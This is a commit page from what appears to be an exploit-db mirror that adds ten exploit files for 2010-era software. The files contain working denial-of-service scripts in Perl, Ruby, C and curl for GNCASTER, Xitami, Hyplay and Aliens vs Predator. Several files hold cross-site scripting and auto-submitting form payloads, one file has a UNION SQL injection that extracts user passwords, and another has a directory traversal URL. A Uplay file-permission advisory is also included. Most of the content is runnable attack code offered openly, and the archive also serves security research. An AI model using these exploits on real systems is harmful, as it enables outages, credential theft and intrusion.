bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 07_06_2014

Browse source
This commit is contained in:
Offensive Security 2014-07-06 04:38:47 +00:00
parent 6c64ec7209
commit b793c8ab94
13 changed files with 784 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
files.csv
View file

@ -30583,5 +30583,17 @@ id,file,description,date,author,platform,type,port
33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0
33959,platforms/asp/webapps/33959.txt,"Multiple Consona Products 'n6plugindestructor.asp' Cross Site Scripting Vulnerability",2010-05-07,"Ruben Santamarta ",asp,webapps,0
33960,platforms/php/webapps/33960.txt,"ECShop 2.7.2 'category.php' SQL Injection Vulnerability",2010-05-07,Liscker,php,webapps,0
33961,platforms/windows/local/33961.txt,"Ubisoft Uplay 4.6 - Insecure File Permissions Local Privilege Escalation",2014-07-03,LiquidWorm,windows,local,0
33962,platforms/hardware/remote/33962.txt,"Cisco Application Control Engine (ACE) HTTP Parsing Security Weakness",2010-05-07,"Alexis Tremblay",hardware,remote,0
33963,platforms/linux/local/33963.txt,"gdomap Multiple Local Information Disclosure Vulnerabilities",2010-05-07,"Dan Rosenberg",linux,local,0
33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 HTTP GET Request Denial Of Service Vulnerability",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0
33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data Denial Of Service Vulnerability",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0
33967,platforms/php/webapps/33967.txt,"Chipmunk Newsletter 2.0 Multiple Cross Site Scripting Vulnerabilities",2010-01-20,b0telh0,php,webapps,0
33968,platforms/windows/dos/33968.pl,"Xitami 5.0 '/AUX' Request Remote Denial Of Service Vulnerability",2010-05-10,"Usman Saeed",windows,dos,0
33969,platforms/php/webapps/33969.txt,"eFront 3.x 'ask_chat.php' SQL Injection Vulnerability",2010-05-09,"Stefan Esser",php,webapps,0
33970,platforms/php/webapps/33970.txt,"EasyPublish CMS 23.04.2010 URI Cross Site Scripting Vulnerability",2010-05-10,"High-Tech Bridge SA",php,webapps,0
33971,platforms/windows/remote/33971.c,"Rebellion Aliens vs Predator 2.22 Multiple Memory Corruption Vulnerabilities",2010-05-07,"Luigi Auriemma",windows,remote,0
33972,platforms/php/webapps/33972.txt,"Advanced Poll 2.0 'mysql_host' Parameter Cross Site Scripting Vulnerability",2010-05-10,"High-Tech Bridge SA",php,webapps,0
33973,platforms/windows/dos/33973.pl,"Hyplay 1.2.0326.1 '.asx' File Remote Denial of Service Vulnerability",2010-05-10,"Steve James",windows,dos,0
33974,platforms/windows/remote/33974.txt,"Mereo 1.9.1 Directory Traversal Vulnerability",2010-05-09,"John Leitch",windows,remote,0
33975,platforms/php/webapps/33975.html,"Affiliate Store Builder 'edit_cms.php' Multiple SQL Injection Vulnerabilities",2010-05-11,"High-Tech Bridge SA",php,webapps,0

Can't render this file because it is too large.

9
platforms/linux/dos/33965.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40009/info
Geo++ GNCASTER is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause the application to crash, resulting in a denial-of-service condition. Arbitrary code-execution may also be possible; this has not been confirmed.
Geo++ GNCASTER 1.4.0.7 is vulnerable; other versions may also be affected.
$ curl -i "http://www.example.com:1234/`perl -e 'printf "A"x988'`"

49
platforms/linux/dos/33966.rb Executable file
View file

@ -0,0 +1,49 @@
source: http://www.securityfocus.com/bid/40015/info
Geo++ GNCASTER is prone to a denial-of-service vulnerability.
An attacker with valid login credentials can exploit this issue to cause the application to crash, resulting in a denial-of-service condition. Arbitrary code-execution may also be possible; this has not been confirmed.
Geo++ GNCASTER 1.4.0.7 is vulnerable; other versions may also be affected.
-------------------------------------------------------------------
#!/usr/bin/env ruby
######################################
# #
# RedTeam Pentesting GmbH #
# kontakt () redteam-pentesting de #
# http://www.redteam-pentesting.de #
# #
######################################
require 'socket'
require 'base64'
if ARGV.length < 3 then
puts "USAGE: %s host:port user:password stream" % __FILE__
puts "Example: %s 127.0.0.1:2101 testuser:secret /0001" % __FILE__
puts
exit
end
host, port = ARGV[0].split(':')
pw, stream = ARGV[1..2]
begin
puts "requesting stream %s" % stream.inspect
sock = TCPSocket.new(host, port.to_i)
sock.write("GET %s HTTP/1.1\r\n" % stream)
sock.write("Authorization: Basic %s\r\n" % Base64.encode64(pw).strip)
sock.write("\r\n")
response = sock.readline
puts "server response: %s" % response.inspect
puts "sending modified nmea data"
sock.write("$GP" + "A" * 2000 +
"GGA,134047.00,5005.40000000,N,00839.60000000," +
"E,1,05,0.19,+00400,M,47.950,M,,*69\r\n")
puts "done"
end
-------------------------------------------------------------------

34
platforms/php/webapps/33967.txt Executable file
View file

@ -0,0 +1,34 @@
source: http://www.securityfocus.com/bid/40024/info
Chipmunk Newsletter is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Chipmunk Newsletter 2.0 is vulnerable; other versions may also be affected.
::[ inurl:admin/login.php "Registering Admin" ]::
1 - http://localhost/sub.php
POSTDATA:
email=<script>alert(&#039;xss&#039;)</script>&choice=sub&lists=1&submit=submit
2 - http://localhost/admin/addaddress.php
POSTDATA:
email=<script>alert(&#039;xss&#039;)</script>&lists=1&submit=submit
then we can check it...
http://localhost/admin/searchaddress.php
POSTDATA:
theaddress=<script>alert(&#039;xss&#039;)</script>&submit=submit

9
platforms/php/webapps/33969.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40032/info
eFront is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
eFront 3.6.2 and prior versions are vulnerable.
http://www.example.com/www/ask_chat.php?chatrooms_ID=0%20UNION%20select%20concat%28login,0x2e,password%29,1,1,1,1%20from%20users%20--%20x

9
platforms/php/webapps/33970.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40037/info
EasyPublish CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
EasyPublish CMS 23.04.2010 is vulnerable; other versions may also be affected.
http://www.example.com/?%22%3E%3Cb%3E%3Cscript%3Ex=document;alert%28x.cookie%29%3C/script%3E

18
platforms/php/webapps/33972.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/40045/info
Advanced Poll is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Advanced Poll 2.08 is vulnerable; other versions may also be affected.
<form method="POST" action="http://www.example.com/misc/get_admin.php" name="main">
<input type="hidden" name="mysql_host" value="<script>alert(document.cookie);</script>">
<input type="hidden" name="db_name" value="X">
<input type="hidden" name="mysql_user" value="X">
<input type="hidden" name="mysql_pass" value="X">
<input type="hidden" name="action" value="connect">
</form>
<script>
document.main.submit();
</script>

7
platforms/php/webapps/33975.html Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40058/info
Affiliate Store Builder is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
<form action='http://www.example.com/admin/edit_cms.php?page=1' name="frm" method='post' > <input name="title" type="hidden" value="Home"/> <input name="type" type="hidden" value="header"/> <input name="desc_meta" type="hidden" value="page+desc" /> <input name="desc_key" type="hidden" value='"><script>alert(document.cookie)</script>' /> <input name="cms_id" type="hidden" value="1" /> <input name="edit_page" type="hidden" value="Edit+Page" /> </form> <script> document.frm.submit(); </script>

78
platforms/windows/dos/33968.pl Executable file
View file

@ -0,0 +1,78 @@
source: http://www.securityfocus.com/bid/40027/info
Xitami is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
Xitami 5.0a0 is vulnerable.
#!/usr/bin/perl
# Xitami/5.0a0 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [10/05/10]
$host = $ARGV[0];
$PORT = $ARGV[1];
$packet = "AUX";
$stuff = "GET /".$packet." HTTP/1.0\r\n\r\n";
use IO::Socket::INET;
if (! defined $ARGV[0])
{
print "+========================================================+\n";
print "+ Program [Xitami/5.0a0 Denial Of Service] +\n";
print "+ Author [Usman Saeed] +\n";
print "+ Company [Xc0re Security Research Group] +\n";
print "+ DATE: [10/05/10] +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport +\n";
print "+ Disclaimer: [This code is for Educational Purposes , +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";
exit;
}
$sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr => $host , PeerPort => $PORT) || die "Cant connect to $host!";
print "+========================================================+\n";
print "+ Program [Xitami/5.0a0 Denial Of Service] +\n";
print "+ Author [Usman Saeed] +\n";
print "+ Company [Xc0re Security Research Group] +\n";
print "+ DATE: [10/05/10] +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport +\n";
print "+ Disclaimer: [This code is for Educational Purposes , +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";
print "\n";
print "[*] Initializing\n";
sleep(2);
print "[*] Sendin DOS Packet \n";
send ($sock , $stuff , 0);
print "[*] Crashed :) \n";
$res = recv($sock,$response,1024,0);
print $response;
exit;

37
platforms/windows/dos/33973.pl Executable file
View file

@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/40048/info
Hyplay is prone to a remote denial-of-service vulnerability.
Attackers may leverage this issue to crash the affected application, denying service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
Hyplay 1.2.0326.1 is vulnerable; other versions may also be affected.
#/usr/bin/perl
#Title: Hyplay 1.2.0326.1 (.asx) Local DoS crash PoC
#Download: http://www.hyplay.com/download.asp
#Written/Discovered by: xsploited Security
#Tested on Windows XP SP2
#URL: http://x-sploited.com/
#Shoutz: kAoTiX, drizzle, JeremyBrown, BreTT, Deca
#A bug exists in the way Hyplay processes malformed .asx play
#list files. This could potentially lead to code execution on
#the users machine.
my $data1=
"\x3C\x61\x73\x78\x20\x76\x65\x72\x73\x69\x6F\x6E\x20\x3D\x20".
"\x22\x33\x2E\x30\x22\x20\x3E\x0D\x0D\x0A\x3C\x65\x6E\x74\x72".
"\x79\x3E\x0D\x0D\x0A".
"\x3C\x72\x65\x66\x20\x68\x72\x65\x66\x20\x3D\x20\x22";
my $data2="http://";
my $data3= #asx file footer
"\x22\x20\x2F\x3E\x0D\x0A\x3C\x2F\x65\x6E\x74\x72\x79\x3E\x0D".
"\x0A\x3C\x2F\x61\x73\x78\x3E";
my $junk = "\x41" x 3000;
open(my $playlist, "> hyplay_d0s.asx");
print $playlist $data1.$data2.$junk.$data3."\r\n";
close $playlist;
print "\nEvil asx file created successfully.";

142
platforms/windows/local/33961.txt Executable file
View file

@ -0,0 +1,142 @@
?
Ubisoft Uplay 4.6 Insecure File Permissions Local Privilege Escalation
Vendor: Ubisoft Entertainment S.A.
Product web page: http://www.ubi.com
Affected version: 4.6.3208 (PC)
4.5.2.3010 (PC)
Summary: Uplay is a digital distribution, digital rights management,
multiplayer and communications service created by Ubisoft to provide
an experience similar to the achievements/trophies offered by various
other game companies.
- Uplay PC is a desktop client which replaces individual game launchers
previously used for Ubisoft games. With Uplay PC, you have all your Uplay
enabled games and Uplay services in the same place and you get access to
a whole new set of features for your PC games.
Desc: Uplay for PC suffers from an elevation of privileges vulnerability
which can be used by a simple user that can change the executable file
with a binary of choice. The vulnerability exist due to the improper
permissions, with the 'F' flag (Full) for 'Everyone' group, making the
entire directory 'Ubisoft Game Launcher' and its files and sub-dirs
world-writable.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5191
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5191.php
Vendor: http://forums.ubi.com/forumdisplay.php/513-Uplay
30.05.2014
--
=======================================================================
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls *.exe |findstr Everyone
UbisoftGameLauncher.exe Everyone:(I)(F)
UbisoftGameLauncher64.exe Everyone:(I)(F)
Uninstall.exe Everyone:(I)(F)
Uplay.exe Everyone:(I)(F)
UplayCrashReporter.exe Everyone:(I)(F)
UplayService.exe Everyone:(I)(F)
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>
=======================================================================
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls Uplay.exe
Uplay.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>
=======================================================================
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls *.exe |findstr (F)
UbisoftGameLauncher.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
UbisoftGameLauncher64.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
Uninstall.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
Uplay.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
UplayCrashReporter.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
UplayService.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>
=======================================================================
C:\Program Files (x86)\Ubisoft>icacls "Ubisoft Game Launcher"
Ubisoft Game Launcher Everyone:(OI)(CI)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
C:\Program Files (x86)\Ubisoft>
=======================================================================
=======================================================================
Changed permissions (vendor fix):
---------------------------------
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>cacls Uplay.exe
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\Uplay.exe BUILTIN\Users:(ID)(special access:)
DELETE
READ_CONTROL
WRITE_DAC
WRITE_OWNER
STANDARD_RIGHTS_REQUIRED
FILE_READ_DATA
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_READ_EA
FILE_WRITE_EA
FILE_EXECUTE
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
labpc\user4dmin:(ID)F
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>
=======================================================================

371
platforms/windows/remote/33971.c Executable file
View file

@ -0,0 +1,371 @@
source: http://www.securityfocus.com/bid/40041/info
Rebellion Aliens vs Predator is prone to multiple memory-corruption vulnerabilities.
Successfully exploiting these issues allows remote attackers to cause denial-of-service conditions. Due to the nature of these issues, arbitrary code execution may be possible; this has not been confirmed.
Aliens vs Predator 2.22 is vulnerable; other versions may also be affected.
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
#define stristr strcasestr
#define stricmp strcasecmp
#endif
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
#define VER "0.1.1"
#define PORT 27010
#define BUFFSZ 0x400 // max size supported by the game
#define RAND_UNIC \
putrr(nick, sizeof(nick) - 1, 1); \
for(x = 0;; x++) { \
p += putxx(p, nick[x], 16); \
if(!nick[x]) break; \
}
int tcp_sock(struct sockaddr_in *peer);
int avp3_send(int sd, int type, u8 *data, int len);
int avp3_recv(int sd, int *type, u8 *data);
int putrr(u8 *data, int len, int sx);
int putcc(u8 *data, int chr, int len);
int putxx(u8 *data, u32 num, int bits);
int getxx(u8 *data, u32 *ret, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
x,
len,
rnd, // id?
bug,
type;
u16 port = PORT;
u8 buff[BUFFSZ],
nick[32 + 1],
*host,
*p;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"Alien vs Predator <= 2.22 multiple vulnerabilities "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <bug> <host> [port(%hu)]>\n"
"\n"
"Bugs:\n"
" 1 = invalid memory access in packet 0x66\n"
" 2 = out of memory allocation in packet 0x66\n"
" 3 = NULL pointer in packet 0x66\n"
" 4 = NULL pointer in packet 0x0c\n"
" 5 = invalid memory access in packet 0x0c\n"
"\n", argv[0], port);
exit(1);
}
bug = atoi(argv[1]);
host = argv[2];
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(host);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));
rnd = time(NULL) ^ peer.sin_port ^ peer.sin_addr.s_addr;
sd = tcp_sock(&peer);
p = buff;
p += putxx(p, 0x00002832, 32); // version? (const static)
p += putxx(p, rnd, 32);
p += putxx(p, 0x01100001, 32);
p += putxx(p, -1, 32);
p += putcc(p, 0, 0x14);
// the game limits the nickname to 32 chars
RAND_UNIC
p += putcc(p, 0, 0xec - (p - buff)); // fixed size
if(avp3_send(sd, 0xf000, buff, p - buff) < 0) goto quit;
len = avp3_recv(sd, NULL, buff);
if(len < 0) goto quit;
printf("- send malformed packet\n");
p = buff;
if(bug == 1) {
p += putrr(p, 0x20, 0); // encrypted with tea key: "J2Z4163G1W3B1PX4", other hidden string "_PAK9TEHAWESOME_"
p += putcc(p, 0, 8);
p += putxx(p, rnd, 32);
p += putxx(p, 0x01100001, 32);
p += putxx(p, 0xffff, 32); // high enough to be allocated but bigger than the source buffer
p += putcc(p, 'a', 0xcc); // 0xcc would be the valid ticket size
type = 0x66;
} else if(bug == 2) {
p += putrr(p, 0x20, 0); // encrypted with tea key: "J2Z4163G1W3B1PX4", other hidden string "_PAK9TEHAWESOME_"
p += putcc(p, 0, 8);
p += putxx(p, rnd, 32);
p += putxx(p, 0x01100001, 32);
p += putxx(p, 0x6fffffff, 32); // unallocable
p += putcc(p, 'a', 0xcc); // 0xcc would be the valid ticket size
type = 0x66;
} else if(bug == 3) {
type = 0x66;
} else if(bug == 4) {
type = 0x0c;
} else if(bug == 5) {
p += putxx(p, 0xf010, 32);
p += putxx(p, 0xccbd, 32);
p += putxx(p, 100, 32);
p += putxx(p, 0x800, 32); // amount of chars that compose the message (0x800 is the max)
p += putxx(p, rnd, 32);
p += putxx(p, 0x01100001, 32);
p += putxx(p, 0x05, 16);
RAND_UNIC // the message
p += putxx(p, 0, 32);
type = 0x0c;
} else {
printf("\nError: invalid bug number (%d)\n", bug);
exit(1);
}
// in my tests in some cases is needed to send the packet multiple times
for(x = 0; x < 5; x++) {
if(avp3_send(sd, type, buff, p - buff) < 0) goto quit;
}
len = avp3_recv(sd, NULL, buff);
if(len < 0) goto quit;
close(sd);
printf("\n- check the server manually for verifying if it's vulnerable or not\n");
return(0);
quit:
printf("\nError: connection interrupted or something else\n");
exit(1);
return(0);
}
int tcp_sock(struct sockaddr_in *peer) {
struct linger ling = {1,1};
int sd;
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
< 0) std_err();
setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
return(sd);
}
u32 avp3_crc(u8 *data, int len) {
u32 crc = 0x9e3779b9;
int i;
if(data && len) {
for(i = 0; i < len; i++) {
crc = data[i] + ((crc << 5) - crc);
}
}
return(crc);
}
int avp3_send(int sd, int type, u8 *data, int len) {
u8 tmp[8];
if(len > BUFFSZ) {
printf("\nError: data too big (0x%x)\n", len);
exit(1);
}
putxx(tmp, type, 16);
putxx(tmp + 2, len, 16);
putxx(tmp + 4, avp3_crc(data, len), 32);
if(send(sd, tmp, 8, 0) != 8) return(-1);
if(send(sd, data, len, 0) != len) return(-1);
return(0);
}
int tcp_recv(int sd, u8 *buff, int len) {
int i,
t;
for(i = 0; i < len; i += t) {
if(timeout(sd, 10) < 0) return(-1);
t = recv(sd, buff + i, len - i, 0);
if(t <= 0) return(-1);
}
return(len);
}
int avp3_recv(int sd, int *type, u8 *data) {
int len,
crc;
u8 tmp[8];
if(tcp_recv(sd, tmp, 8) < 0) return(-1);
if(type) getxx(tmp, type, 16);
getxx(tmp + 2, &len, 16);
getxx(tmp + 4, &crc, 32);
if(len > BUFFSZ) return(-1);
if(tcp_recv(sd, data, len) < 0) return(-1);
return(len);
}
int putrr(u8 *data, int len, int sx) {
static const char table[] =
"0123456789"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz";
static u32 rnd = 0;
int i;
if(!rnd) rnd = ~time(NULL);
if(sx) {
len = rnd % len;
if(len < 3) len = 3;
}
for(i = 0; i < len; i++) {
rnd = ((rnd * 0x343FD) + 0x269EC3) >> 1;
if(sx) {
data[i] = table[rnd % (sizeof(table) - 1)];
} else {
data[i] = rnd;
}
}
if(sx) data[i] = 0;
return(i);
}
int putcc(u8 *data, int chr, int len) {
memset(data, chr, len);
return(len);
}
int putxx(u8 *data, u32 num, int bits) {
int i,
bytes;
bytes = bits >> 3;
for(i = 0; i < bytes; i++) {
data[i] = (num >> (i << 3));
}
return(bytes);
}
int getxx(u8 *data, u32 *ret, int bits) {
u32 num;
int i,
bytes;
bytes = bits >> 3;
for(num = i = 0; i < bytes; i++) {
num |= (data[i] << (i << 3));
}
*ret = num;
return(bytes);
}
int timeout(int sock, int secs) {
struct timeval tout;
fd_set fd_read;
tout.tv_sec = secs;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
if(select(sock + 1, &fd_read, NULL, NULL, &tout)
<= 0) return(-1);
return(0);
}
u32 resolv(char *host) {
struct hostent *hp;
u32 host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u32 *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif

9
platforms/windows/remote/33974.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40053/info
Mereo is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files and directories within the context of the webserver. Information harvested may aid in launching further attacks.
Mereo 1.9.1 is vulnerable; other versions may also be affected.
http://www.example.com/%80../%80../%80../%80../%80../%80../%80../%80../